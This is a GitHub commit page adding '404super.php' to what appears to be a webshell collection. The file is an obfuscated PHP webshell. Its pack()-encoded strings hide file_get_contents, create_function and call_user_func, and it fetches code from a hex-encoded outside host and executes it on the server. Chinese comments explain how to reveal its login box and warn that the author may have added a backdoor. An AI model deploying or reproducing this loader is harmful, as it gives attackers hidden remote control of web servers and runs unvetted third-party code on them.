Skip to content

Commit

Permalink
update 404super php webshell
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc committed Mar 26, 2014
1 parent 06db14d commit df896b9
Showing 1 changed file with 23 additions and 0 deletions.
23 changes: 23 additions & 0 deletions php/blackbin/404super.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
<?php
session_start();
ini_set('memory_limit',-1);
//**********************************
//不保证作者加后门
//请自行甄别
//使用方法:打开shell地址后按“p”键,之后会出现登录框
//http://require.duapp.com/session.php
//**********************************
//自定义密码 不设置默认密码为demo
//define('pass','123456');
$i = pack('c*', 0x70, 0x61, 99, 107);
$GLOBALS = array(
'p' => pack('c*', 0x70, 0x61, 99, 107),
'c' => $i('c*', 99, 97, 108, 108, 95, 117, 115, 101, 114, 95, 102, 117, 110, 99),
'f' => $i('c*', 102, 105, 108, 101, 95, 103, 101, 116, 95, 99, 111, 110, 116, 101, 110, 116, 115),
'e' => $i('c*',0x63,0x72,0x65,0x61,0x74,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e),
'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),
's' =>$i('c*',0x73,0x70,0x72,0x69,0x6e,0x74,0x66)
);
if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}
$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSION['t']))));
?>

0 comments on commit df896b9

Please sign in to comment.